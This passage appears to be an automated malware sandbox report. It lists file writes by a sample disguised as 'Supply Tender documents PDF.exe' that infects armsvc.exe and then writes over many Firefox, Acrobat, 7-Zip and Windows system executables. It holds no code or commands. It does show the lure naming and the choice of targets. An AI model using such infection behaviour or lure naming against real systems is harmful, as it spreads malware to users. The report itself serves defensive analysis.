Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\wbem\WmiApSrv.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\vds.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	System file written: C:\Windows\System32\alg.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\7-Zip\7zFM.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\snmptrap.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\Spectrum.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Windows Media Player\wmpnetwk.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\Locator.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\7-Zip\7z.exe	Jump to behavior
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	System file written: C:\Windows\System32\AppVClient.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\SysWOW64\perfhost.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\7-Zip\7zG.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\msiexec.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\VSSVC.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\wbengine.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\SearchIndexer.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\TieringEngineService.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\AgentService.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\FXSSVC.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\OpenSSH\ssh-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\SensorDataService.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\msdtc.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior

Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe	Jump to dropped file
